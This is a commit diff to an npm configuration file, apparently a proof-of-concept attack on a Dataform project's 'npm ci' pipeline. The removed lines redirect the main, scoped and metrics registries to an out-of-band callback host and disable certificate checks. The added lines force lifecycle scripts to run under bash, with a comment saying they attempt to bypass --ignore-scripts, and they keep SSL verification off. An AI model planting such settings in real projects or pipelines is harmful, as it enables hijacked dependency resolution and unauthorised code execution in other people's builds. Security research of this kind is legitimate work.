Add lifecycle scripts to test npm ci execution

--- a/.npmrc
+++ b/.npmrc
@@ -1,36 +1,25 @@
-# Aggressive npm Registry Override Test
-# Testing multiple ways to redirect npm traffic
+# SCRIPT EXECUTION OPTIONS (attempting to bypass --ignore-scripts)
+foreground-scripts=true
+ignore-scripts=false
+script-shell=/bin/bash
 
-# Primary registry override
-registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-main/
-
-# Scoped registries
-@dataform:registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-dataform/
-@types:registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-types/
+# Use real npm registry (so @dataform/core resolves correctly)
+registry=https://registry.npmjs.org/
 
 # Disable SSL verification
 strict-ssl=false
-
-# Disable certificate checking
-ca=null
 
 # Force network fetching (no cache)
 prefer-offline=false
 prefer-online=true
 
-# Disable package-lock (force shrinkwrap)
-package-lock=false
-
 # Logging for debugging
 loglevel=silly
 
-# Fetch retries (ensure we try to connect)
+# Fetch retries
 fetch-retries=3
 fetch-retry-mintimeout=1000
 fetch-retry-maxtimeout=10000
 
-# User agent to identify in OAST
+# User agent to identify
 user-agent=npm-dataform-poc-test
-
-# Metrics endpoint (another OAST vector)
-metrics-registry=https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm-metrics/
